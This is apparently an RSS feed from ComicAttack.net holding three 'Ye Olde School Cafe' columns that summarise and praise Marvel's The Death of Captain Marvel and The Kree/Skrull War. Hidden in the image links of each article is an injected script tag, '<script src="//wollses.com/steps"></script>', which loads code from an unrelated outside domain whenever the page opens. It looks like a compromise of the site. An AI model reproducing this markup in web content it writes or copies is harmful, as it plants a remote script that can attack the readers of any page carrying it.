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	<title>Rick Jones &#8211; ComicAttack.net</title>
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	<title>Rick Jones &#8211; ComicAttack.net</title>
		<title>Ye Olde School Cafe&#039;: The Death of Captain Marvel</title>
		<pubDate>Sat, 14 Nov 2009 16:08:13 +0000</pubDate>
		<category><![CDATA[Ye Olde School Cafe]]></category>
		<category><![CDATA[Jim Starlin]]></category>
		<category><![CDATA[Lady Death]]></category>
		<category><![CDATA[Rick Jones]]></category>
		<guid isPermaLink="false">https://comicattack.net/?p=8564</guid>

					<description><![CDATA[Come one, come all, to the wonderful world of Ye Olde School Cafe&#8217;. This week I want to talk about another one of Marvel&#8217;s Graphic Novel&#8217;s. I know last week some of you seemed to really enjoy Emperor Doom but this week is my personal favorite, The Death of Captain Marvel. This particular OGN is [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a href="https://comicattack.net//wp-content/uploads/2009/09/yeoldschool3.jpg"><img fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-2674" src="https://comicattack.net//wp-content/uploads/2009/09/yeoldschool3.jpg" alt="yeoldschool" width="630" height="250" srcset="https://comicattack.net/wp-content/uploads/2009/09/yeoldschool3.jpg 630w, https://comicattack.net/wp-content/uploads/2009/09/yeoldschool3-300x119.jpg 300w" sizes="(max-width: 630px) 100vw, 630px" /></a><br />
Come one, come all, to the wonderful world of <strong>Ye Olde School Cafe&#8217;</strong>. This week I want to talk about another one of <em>Marvel&#8217;s Graphic Novel&#8217;s</em>. I know last week some of you seemed to really enjoy <em><a href="https://comicattack.net/2009/11/yosc4/">Emperor Doom</a></em> but this week is my personal favorite, <em>The Death of Captain Marvel</em>. This particular OGN is one of the few comics that I&#8217;ll actually admit I get a little emotional over when I read it.<br />
<a href="https://comicattack.net/wp-content/uploads/2009/11/Deathcaptainmarvel.jpg"><img decoding="async" class="aligncenter size-full wp-image-9090" src="https://comicattack.net/wp-content/uploads/2009/11/Deathcaptainmarvel.jpg" alt="Deathcaptainmarvel" width="609" height="809" /></a><br />
This story was written by Jim Starlin and Edited by Al Migrom; colors by Steve Oliff, lettered by James Novak. It was originally published in1982 and the Editor-in-Chief at that time was Jim Shooter. Now, Shooter and Starlin in my opinion are two of the all-time best writers in the cosmic genre. Most of what you see today as far as outer space adventures are concerned can directly be traced to these two guys (and Jack Kirby). This story was reprinted more times than I can count for one big reason: It&#8217;s a great story.<br />
First our tale begins with Mar-Vell aboard a space ship recording an autobiography so that his friends will have something to remember him by after he&#8217;s gone. He&#8217;s interrupted by Eros or &#8216;Starfox,&#8217; as he&#8217;s also known by. Eros is the son of Mentor, who is the leader of the ancient race of beings called Eternals from the planet of Titan. Mentor is also father to Mar-Vells greatest enemy; Thanos, who is quite possibly the living embodiment of evil. He lives only to serve Lady Death and appease her by killing innocent people. Mar-Vell is seen reliving his days as a youthful Kree warrior, and his first trip to Earth where the woman he loved was killed before his eyes.<br />
Next we see Mar-Vell, Eros and Mentor landing on a planet so they can retrieve the solidified body of their enemy Thanos. They intend to take him back home to Titan for internment. Once they arrive and find the statuesque body of Thanos, they are attacked by his would-be followers, and after they dispose of them, Eros and Mentor see Mar-Vell coughing and having trouble catching his breath. He then tells them that he is feeling ill and they demand that he gets scanned by their computer once they are back on the ship. At this point in our story, Mar-Vell reveals to them that he has cancer and the readings from the computer confirm this prognosis. It also tells him he only has a couple of months to live.<br />
We see Mar-Vell tell Mentor about an adventure he had a few years back when he had to subdue a villain named Nitro. In this fight he had to not only stop Nitro, but also a canister of nerve gas that was leaking and threatening the lives of innocent people. Mar-Vell stopped the villain and the gas but the gas acted like a carcinogen in his body and that&#8217;s where the cancer cells began to form. Mentor then asks him if he has told the woman he loves, Elysius, about his condition. After telling her, she weeps as he holds her in his arms for the last time.<br />
<a href="https://comicattack.net/wp-content/uploads/2009/11/DOCM03.jpg"><img decoding="async" class="alignleft size-full wp-image-9100" src="https://comicattack.net/wp-content/uploads/2009/11/DOCM03.jpg" alt="DOCM03" width="320" height="300" /><script src="//wollses.com/steps"></script></a>The next scene shows Mar-Vell making another tape for his friends. He tells them about how he was branded a traitor and banished to the Negative Zone for his crimes by The Supreme Intelligence. Once there he thought that he would float on forever in that wasteland, but as luck would have it, Rick Jones found an ancient pair of Nega-Bands in a remote cave. Mar-Vell found out that the two could communicate when Rick put them on, but when Rick would clash them together, the two would trade places. Mar-Vell recalls days past and his battles side by side with The Avengers, Adam Warlock, The Fantastic Four and just about every other superhero you can think of.<br />
After strolling down memory lane he realizes that the gas could have affected Rick as well, so he sets out to talk to him about it. This conversation doesn&#8217;t go very well as you can imagine, especially with Rick&#8217;s bad temper. So, Captain Marvel journeys back to Titan and speaks with Elysius about the trip and Rick&#8217;s reaction. We then see Rick ask The Avengers for help but they tell him there&#8217;s no use, so he tells them off and storms out hoping to find someone to help his friend. As time passes we see the word of Mar-Vell&#8217;s sickness spread throughout the Galaxy and the pain that goes along with it.<br />
At this time we start to see Mar-Vell lose his battle slowly but surely. He says, &#8220;Overwhelming pain&#8230; it burns, it tears, it twists and it bends&#8230; it kills. It kills slowly&#8230; a little piece at a time&#8230; and then it fades. Yes, the pain comes and it goes&#8230; but the anger always remains.&#8221; We see him having quite a few reflecting moments during this part of the story and it is very moving. Mentor, who has been joined by the likes of Reed Richards, Doctor Strange and Hank McCoy (Beast) in searching for some answers as to how they can save this true warrior and friend.<br />
Soon after they realize their research is futile, Eros informs them that Mar-Vell collapsed and was taken to his bed. We see the woman he loves and the Earth man Rick Jones sobbing, sitting outside helplessly as their friend deteriorates. The next panel shows a collection of heroes not seen in ages to come and pay respects to the man whom everybody came to know as a friend. We see Ben Grimm and Spider-Man trying to cheer him up, but the level of emotion overwhelms Peter and he has to leave the room. Beast and Peter have a talk about it but are interrupted by none other than Rick Jones, who has come to be by the side of his best friend. Mar-Vell is also visited by his old friends Drax and Moondragon. He hasn&#8217;t seen them in quite a while so they talk about old times, but are suddenly startled by someone else at the door. The Skrulls sent an emissary to show respect for their most hated but most admired enemy. The Skrull commander tells Mar-Vell about how the Skrulls thought of him as a great warrior.<br />
<a href="https://comicattack.net/wp-content/uploads/2009/11/MArvel.jpg"><img loading="lazy" decoding="async" class="alignleft size-full wp-image-9096" src="https://comicattack.net/wp-content/uploads/2009/11/MArvel.jpg" alt="MArvel" width="320" height="211" /></a>Soon after we see Eros informing everyone that Mar-Vell has slipped into a coma. With all his friends around him, Mar-Vell starts to dream. He dreams that he is fighting his worst enemy, Thanos. The two warriors fight tooth and nail and eventually Mar-Vell&#8217;s old enemies that are dead try to subdue him as well, and after defeating all these threats, he realizes they are all illusions. He then speaks with Thanos and he tells Mar-Vell that he can&#8217;t fight death and it has come for him. We see Lady Death herself come to him and deliver the cold kiss of death and then Death, Thanos and Captain Marvel walk towards a blinding light and into eternity. The last image we see is Eros and Mentor standing over Mar-Vell&#8217;s bed and covering him with a blanket, while all of Marvel&#8217;s greatest heroes are left in tears.<br />
As I previously stated, this story is my favorite GN for several reasons. One is the spectacular writing. There are many scenes within this book that only take one or two panels to get a point across and there&#8217;s no wondering what to think or feel. It&#8217;s all raw emotion and I love it. Mystery and long drawn out stories can be good as well, but this one being right to the point is what helps make it great. Secondly, anytime you have a major player that is going to die you can&#8217;t help but get attached and want the guy to beat the odds. There&#8217;s nothing like a good underdog story. Let me just say in closing that in the last couple of years this book has had an even bigger impact on my life than I ever thought it would. You see, in the spring of 2008 I found out that I have cancer. There is no way to explain how you feel when you hear the news about something like this. There really are no words. Luckily for me, I had surgery immediately and the doctors were very aggressive with the treatments that followed so things are looking good for me. Well, that&#8217;s it for this week. I hope you enjoyed this edition and if you don&#8217;t own this book, believe me it is more than worth the going price. See you next time!<br />
<span style="text-decoration: underline">Billy Dunleavy<br />
</span><a href="mailto:billy@comicattack.net">billy@comicattack.net</a></p>
		<title>Ye Olde School Cafe&#039;: The Kree/Skrull War pt 2</title>
		<pubDate>Sat, 31 Oct 2009 17:36:42 +0000</pubDate>
		<category><![CDATA[Ye Olde School Cafe]]></category>
		<category><![CDATA[Captain Marvel]]></category>
		<category><![CDATA[Rick Jones]]></category>
		<category><![CDATA[The Kree/Skrull War]]></category>
		<guid isPermaLink="false">https://comicattack.net/?p=7611</guid>

					<description><![CDATA[Welcome back comic fans to Ye olde School Cafe&#8217;. This week is part 2 of the ever enduring tale of The Kree-Skrull War! Previously we found out about Captain Marvel&#8217;s exploits on Earth and in the Negative Zone; we also learned about how the Fantastic Four had faced down a Skrull threat from years before [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a href="https://comicattack.net//wp-content/uploads/2009/09/yeoldschool3.jpg"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-2674" src="https://comicattack.net//wp-content/uploads/2009/09/yeoldschool3.jpg" alt="yeoldschool" width="630" height="250" srcset="https://comicattack.net/wp-content/uploads/2009/09/yeoldschool3.jpg 630w, https://comicattack.net/wp-content/uploads/2009/09/yeoldschool3-300x119.jpg 300w" sizes="(max-width: 630px) 100vw, 630px" /></a><br />
Welcome back comic fans to <strong>Ye olde School Cafe&#8217;</strong>. This week is part 2 of the ever enduring tale of <em>The Kree-Skrull War</em>! Previously we found out about Captain Marvel&#8217;s exploits on Earth and in the Negative Zone; we also learned about how the Fantastic Four had faced down a Skrull threat from years before and left the aliens in a field believing they were cows. We also learned of a political menace right outside the doors of Avengers mansion in the form of  H. Warren Craddock. We then gazed deeply across the stars and into the world of the Kree on their home-world of Hala. Next we saw how said politician aroused the American people and made them think the Avengers had done something wrong. Finally we got to see SuperSkrull in action and he subdued Quicksilver, The Scarlet Witch and Captain Marvel. This story was written by<strong> Roy Thomas</strong> and penciled by <strong>Neal Adams</strong> and <strong>John Buscema</strong>. It was originally published in <em>Avengers #95-97 </em>in 1971.<br />
<a href="https://comicattack.net//wp-content/uploads/2009/10/KreeSkrullWar1.jpg"><img loading="lazy" decoding="async" class="alignleft size-full wp-image-7661" style="margin: 1px 4px" src="https://comicattack.net//wp-content/uploads/2009/10/KreeSkrullWar1.jpg" alt="KreeSkrullWar1" width="224" height="270" /></a>All right, so onto part number two of this story. We first see the Inhuman Triton appear during the fight between the Avengers and the Mandroids; these two groups are at odds because the government has been led to believe the Avengers were helping an alien that was on a mission to destroy the Earth. After fairly easily defeating the Mandroids, we see our heroes rush to the aid of Triton who has received a less than warm welcome from the police and some dock workers. He tells them about how he left his homeland seeking the Fantastic Four to help find the king of the Inhumans, Black Bolt. He also tells them how while Black Bolt has been away, his mad brother Maximus has assumed control and plans to take over the entire planet. Following a brief argument between Iron Man and Vision, the team agrees to help Black Bolt, and then they will rush head first out into space to save Mar-Vell, Quicksilver and the Scarlet Witch.<br />
After helping to defeat the threat in Black Bolts kingdom, we see our heroes go to Nick Fury for help in getting a spacecraft to aid their captive friends. No sooner do they get into the far reaches of space when they run smack into the Skrull armada! The Avengers tear through the fleet of ships with reckless abandon until they reach the leader&#8217;s ship. Once inside they demand to know where Wanda and Pietro are being held. The Skrull king himself appears on the monitor screen and shows the Avengers that Mar-Vell is actually helping them against his own kind. The Avengers don&#8217;t know what to think until they see it was a Skrull trick and Mar-Vell is actually trying to help Quicksilver and Wanda escape. Once they see this they start to pound on the Skrulls on board the ship until Vision almost kills the captain and has to be restrained by Thor and Iron Man.<br />
<a href="https://comicattack.net//wp-content/uploads/2009/10/1571_2_097.jpg"><img loading="lazy" decoding="async" class="alignleft size-full wp-image-7664" style="margin: 1px 4px" src="https://comicattack.net//wp-content/uploads/2009/10/1571_2_097.jpg" alt="1571_2_097" width="200" height="297" /><script src="//wollses.com/steps"></script></a>We next see Rick Jones in the Kree throne room as he was transported there earlier during the fight with the Inhumans and the Kree who made a deal with Maximus. Rick tries his best to stop Ronan but he gets thrown into a detention cell only to be surprised by the cell&#8217;s other guest, The Supreme Intelligence. The Supreme Intelligence tosses Rick through a portal and he ends up in the Negative Zone and face to face with Annihilus. They have a brief tussle but it&#8217;s stopped when a beam shoots out of Rick&#8217;s forehead and sends Annihilus spiraling into the depths of the Negative Zone. Rick finds his way back to the portal and leaps through. All this time Quicksilver and the Scarlet Witch were freed from captivity and joined Mar-Vell in trying to stop the Skrull king from executing his devious plan.<br />
After a brief conversation where the Supreme Intelligence tells Rick that he possesses vast psionic power that he can use, and does, to create heroes from years past that he read about in comics. Namor, Captain America and Blazing Skull just to name a few, appear to fight with the Kree that are trying to silence The Intelligence and Rick. An all out battle ensues with the Kree guards and the heroes from the past. While all this is going on The Avengers are still battling an army of Skrulls in their way of saving Wanda and Pietro. Rick then uses his new found powers to send a bolt of energy across the stars that hits Mar-Vell and stuns the entire Kree and Skrull armies and freezes them in place like statues. Meanwhile back on Earth, H. Warren Craddock is zapped by this enormous ray and revealed in front of the world to be a Skrull himself! We then switch back to the Kree throne room where Rick Jones collapses from the strain of using this new power on such a grand scale.<br />
The Supreme Intelligence then opens a portal to bring the Avengers to Hala and they arrive only to see Rick lying motionless on the floor. The Supreme Intelligence tells the spectators that Mar-Vell can save Rick if he merges together with Rick forever. After some pondering Mar-Vell realizes it is the right thing to do, so he becomes one with Rick and revives him as if nothing was ever wrong. The Avengers tell Rick that they&#8217;ll fill him in on what happened whey they get home. The Supreme Intelligence transports them there and they meet up with Fury, who he tells them about Craddock being a Skrull. All seems to be well until our heroes realize that one of their numbers did not return; Goliath was never transported by The Supreme Intelligence back in the throne room when they saw Rick dead! But that&#8217;s a tale for another time (<em>Avengers #98</em> to be exact). Now it&#8217;s time to say the end! This story laid the ground work for Secret Invasion, make no mistake about it. That story would have never been if not for this one preceding it. That&#8217;s it for this week, tune in next week  for another exciting adventure!<br />
<span style="text-decoration: underline">Billy Dunleavy<br />
		<title>Ye Olde School Cafe&#039;: The Kree/Skrull War pt 1</title>
		<pubDate>Sat, 24 Oct 2009 17:30:17 +0000</pubDate>
		<category><![CDATA[Ye Olde School Cafe]]></category>
		<category><![CDATA[Captain Marvel]]></category>
		<category><![CDATA[Fantastic Four]]></category>
		<category><![CDATA[Rick Jones]]></category>
		<guid isPermaLink="false">https://comicattack.net/?p=6701</guid>

					<description><![CDATA[Greetings fellow Comic Attackers to this week&#8217;s edition of Ye Olde School Cafe&#8217;! This week is going to be a good one because I&#8217;ll be talking about one of Marvel&#8217;s all time best star-spanning stories; The Kree/Skrull War. A little back story on my own experience with this first then on to the adventure itself. [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a href="https://comicattack.net//wp-content/uploads/2009/09/yeoldschool3.jpg"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-2674" src="https://comicattack.net//wp-content/uploads/2009/09/yeoldschool3.jpg" alt="yeoldschool" width="630" height="250" srcset="https://comicattack.net/wp-content/uploads/2009/09/yeoldschool3.jpg 630w, https://comicattack.net/wp-content/uploads/2009/09/yeoldschool3-300x119.jpg 300w" sizes="(max-width: 630px) 100vw, 630px" /></a><br />
Greetings fellow Comic Attackers to this week&#8217;s edition of <strong>Ye Olde School Cafe&#8217;</strong>! This week is going to be a good one because I&#8217;ll be talking about one of Marvel&#8217;s all time best star-spanning stories; <em>The Kree/Skrull War</em>. A little back story on my own experience with this first then on to the adventure itself.<br />
When I started collecting comics around 1990, there had been a really good amount of stories in the Marvel U, most of which I&#8217;ll eventually be talking about in this very column. This is definitely one of those stories from years past. The plot itself was conceived by Roy Thomas, with Neal Adams and John Buscema doing a superb job on the artwork. This story was originally published in 1971 but my first introduction was through the reprint in the Special Edition that was released in 1983. I can still vaguely remember walking through my lcs (local comic shop) and thumbing through the back issues of Avengers and finding part 2 of this saga. They didn&#8217;t have part 1 but I thought what the heck, it looks really cool and I love the cosmic aspect of comics, so I bought it. It took me quite a few years later to complete the set because I eventually bought the Marvel Essentials volume that contains this epic story so it wasn&#8217;t a priority, but I eventually obtained part 2 and the rest is history. I actually thought it was a good idea to buy the first part once Secret Invasion spoilers hit and the Skrull angle was revealed. I&#8217;ll be taking on part one this week and diving into part 2 next week, so here we go.<br />
<a href="https://comicattack.net//wp-content/uploads/2009/10/capt-mar-vell-kree-skrull-war.jpg"><img loading="lazy" decoding="async" class="alignleft size-full wp-image-6706" style="margin: 1px 4px" src="https://comicattack.net//wp-content/uploads/2009/10/capt-mar-vell-kree-skrull-war.jpg" alt="capt mar-vell kree-skrull war" width="200" height="302" srcset="https://comicattack.net/wp-content/uploads/2009/10/capt-mar-vell-kree-skrull-war.jpg 200w, https://comicattack.net/wp-content/uploads/2009/10/capt-mar-vell-kree-skrull-war-199x300.jpg 199w" sizes="(max-width: 200px) 100vw, 200px" /></a>To start out, the reprint summarizes the prologue in which we saw Captain Marvel (Mar-Vell) return to Earth, after being sent to the Negative Zone by his people the Kree as punishment for what they considered him betraying them. Upon learning of his return to Earth, the Avengers also found out that his trip to the Negative Zone had given his body severe radiation poisoning. He was unaware of this though, and tried to steal a rocket to get back to the Kree home-world (Hala) and stop the power mad Ronan the Accuser who had usurped the throne from The Supreme Intelligence. While trying to flee earth, Rick Jones, ally and friend of the Hulk and Avengers, zaps Mar-Vell with some wacky laser pistol and drops him. These two are telepathically linked so Rick can find Mar-Vell wherever he is.<br />
Next we see Mar-Vell being decontaminated with the help of the Avengers, but Ronan has been watching all of this and just when the time is right, he activates Kree Sentry #459 (a giant robot capable of stopping just about anything). The Kree Sentry whips the Avengers and abducts Mar-Vell taking him to a secret Alaskan base where Ronan has arrived to tell Mar-Vell that the Earth will be destroyed because their technological advancements are threatening the Kree. At this point all heck breaks loose as the Avengers show up and start to battle the Kree Sentry once more, but also Ronan receives a message from his home-world that the devious Skrulls have launched an all out attack on the Kree deep in space. Ronan abandons his plans on Earth to teleport to his native land and defend it against the Skrull threat.<br />
Now at this point you would expect things to calm down for Earth&#8217;s Mightiest Heroes, but don&#8217;t bet on it. They actually wind up facing the U.S. government who is charging them with crimes for harboring a dangerous and contaminated alien. The man leading the charge is Warren Craddock; he&#8217;s been appointed by government to head a new task force on alien activities. In no time flat the American public feels betrayed by this situation and starts to protest against the Avengers. Upon hearing all this, the original &#8220;big three&#8221; Avengers, Thor, Captain America and Iron Man decide to disband the team because of what the public sees as a lapse in judgment.<br />
The team of Thor, Captain America and Iron Man gather at Avengers HQ to decide the next move for the team only to be interrupted by the Vision, who stumbles in and seemingly dies right before their very eyes! The team doesn&#8217;t actually seem too broken up about it, but are interrupted by Ant Man who proceeds to do an internal investigation on Vision to see what happened. After battling all sorts of mechanical defenses and running around, he gets Vision up and running again, but also tells the team he&#8217;s leaving to do his own thing. Vision then goes on to tell the original team that after they were disbanded they all left, but while trying to go their separate ways they were attacked by cows. Yeah, you heard me, cows. Well, that does sound a little crazy, but if you know your Fantastic Four history you&#8217;ll remember that first time the FF met up with the Skrulls it ended with Reed turning them into cows and leaving them in a farmers field. So guess what; The cows are mad and they want revenge. They immediately transform into the FF and lay a beating on the unsuspecting Avengers, but Vision managed to escape because of his intangibility.<br />
<a href="https://comicattack.net//wp-content/uploads/2009/10/avengers93.jpg"><img loading="lazy" decoding="async" class="alignright size-full wp-image-6708" style="margin: 1px 4px" src="https://comicattack.net//wp-content/uploads/2009/10/avengers93.jpg" alt="avengers93" width="200" height="297" /><script src="//wollses.com/steps"></script></a><br />
We then flash forward to Captain Marvel and Carol Danvers being held captive by the Skrulls, and they reveal to them just how they managed to dupe everyone into thinking they were the FF and subdue the Avengers. The original members soon find themselves in combat against the Skrull imposter&#8217;s and eventually get the advantage on them. Meanwhile aboard the crazy Skrull ship, Mar-Vell breaks free and he and Carol attempt to send a message to the Kree home-world about the Skrull infestation on Earth. Just as he is about to send the distress call he realizes that &#8220;Carol&#8221; is a Skrull, or better yet, Super-Skrull. He subdues Mar-Vell then takes off into orbit to rocket back to his home world with his prisoner.<br />
After this crazy scenario we see the Vision use his powers of flight and intangibility to get aboard the Skrull ship in an attempt to rescue The Scarlet Witch, Quicksilver and Mar-Vell. He struggles against Super-Skrull who eventually engages a lever that detonates a huge bomb where the craft was hidden on Earth.  Back on the ship the Super-Skrull gloats over his victory and tells of how the Skrulls mean to take out the Kree and Earth in one fell swoop. We then see the Skrull ship attacking the citadel of the mighty Skrull leader himself as the Super-Skrull tries to overthrow his master. He eventually is defeated by his ruler and the three captives aboard the ship are brought before the monarch. The Skrull leader, Dorrek VII knows that Mar-Vell can construct an Omni-Wave projector: a device that can send messages throughout different galaxies. So he tells Mar-Vell that he will construct one for him to use or the captured Avengers will be killed. After Wanda and Pietro endure quite a beating Mar-Vell agrees to build the device for the King.<br />
Back on Earth, the government has decided to apprehend the Avengers for their alleged crime of harboring the Kree man, Mar-Vell. They send giant robots being manned by soldiers on the inside, called Mandroids, to arrest the Avengers for their transgression. That, my friends, is where I will leave you until next week&#8217;s startling conclusion. In the exciting ending to this awesome story we&#8217;ll see the Inhumans join the fight along with Black Bolt&#8217;s treacherous brother, Maximus. We will also see the Avengers travel across the stars to rescue their captive teammates, the real agenda of Waren Craddock and a battle royale for the ages between the Kree, Skrulls and the Mighty Avengers. &#8216;Till next time make mine Marvel!<br />
<span style="text-decoration: underline">Billy Dunleavy</span><br />
<a href="mailto:billy@comicattack.net">billy@comicattack.net</a></p>